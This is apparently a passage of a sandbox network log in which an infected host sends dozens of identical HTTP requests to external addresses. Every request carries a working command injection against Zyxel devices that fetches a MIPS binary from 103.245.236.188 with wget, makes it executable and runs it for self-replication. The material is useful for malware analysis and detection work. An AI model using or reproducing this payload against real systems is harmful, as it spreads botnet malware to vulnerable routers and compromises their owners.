                                                Jan 12, 2024 18:24:30.724983931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3218192.168.2.1344760125.32.154.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725075006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3219192.168.2.1348066206.111.136.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725151062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3220192.168.2.1357980156.183.33.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725229025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3221192.168.2.1360126159.185.251.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725310087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3222192.168.2.1344590186.233.210.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725375891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3223192.168.2.1337270142.203.69.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725425005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3224192.168.2.133945235.110.2.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725488901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3225192.168.2.135284869.167.48.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725565910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3226192.168.2.1357514194.217.110.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725637913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3227192.168.2.134052227.177.142.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725718975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3228192.168.2.1333076177.172.237.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725724936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3229192.168.2.1347904108.137.72.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725815058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3230192.168.2.1338988103.141.80.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725845098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3231192.168.2.1348784121.37.9.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725912094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3232192.168.2.134042266.43.40.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.725946903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3233192.168.2.1337016194.81.82.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726066113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3234192.168.2.1359468155.157.34.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726095915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3235192.168.2.1342586131.69.75.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726128101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3236192.168.2.133721027.206.64.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726140022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3237192.168.2.1356436170.103.182.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726239920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3238192.168.2.13503888.135.210.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726285934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3239192.168.2.1351614202.118.36.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726341963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3240192.168.2.135685414.252.184.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726425886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3241192.168.2.1360586112.7.17.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726535082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3242192.168.2.133451474.56.224.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726572990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3243192.168.2.13606022.187.243.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726641893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3244192.168.2.1344752137.111.215.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726715088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3245192.168.2.1342310189.90.238.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726783991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3246192.168.2.1340090183.84.52.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726841927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3247192.168.2.134660237.55.63.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726917028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3248192.168.2.1355686128.16.142.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.726984024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3249192.168.2.135932639.154.227.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727083921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3250192.168.2.1338234123.68.221.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727117062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3251192.168.2.135480282.7.101.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727166891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3252192.168.2.1335776153.149.150.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727284908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3253192.168.2.1352736122.104.152.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727332115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3254192.168.2.1338340142.195.176.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727408886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3255192.168.2.1355762168.133.12.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727421999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3256192.168.2.1339612167.16.50.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727457047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3257192.168.2.135119497.57.195.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727595091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3258192.168.2.1349550195.176.183.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727603912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3259192.168.2.1352328212.188.94.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727648973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3260192.168.2.135299218.158.227.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727715969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3261192.168.2.1355136105.97.201.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727776051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3262192.168.2.134387014.155.35.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.727863073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3263192.168.2.135312482.207.5.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.733795881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3264192.168.2.133914044.116.207.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.733844995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3265192.168.2.1341858126.186.244.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.733949900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3266192.168.2.1356268188.152.59.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.734006882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3267192.168.2.1340004109.150.20.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.734076977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3268192.168.2.1356808136.133.69.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.734143972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3269192.168.2.1339742152.139.221.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.734191895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3270192.168.2.134534461.38.204.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.734277010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3271192.168.2.134885278.43.42.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:30.734319925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3272192.168.2.1346340206.4.43.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734430075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3273192.168.2.1334490218.207.195.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734467030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3274192.168.2.133855662.42.246.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734508038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3275192.168.2.1354840103.127.227.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734610081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3276192.168.2.134187024.212.176.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734652996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3277192.168.2.1338988113.39.178.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734684944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3278192.168.2.1359344160.231.52.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734745979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3279192.168.2.1333126206.166.14.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:31.734769106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3280192.168.2.133419654.194.2.81443
                                                TimestampBytes transferredDirectionData
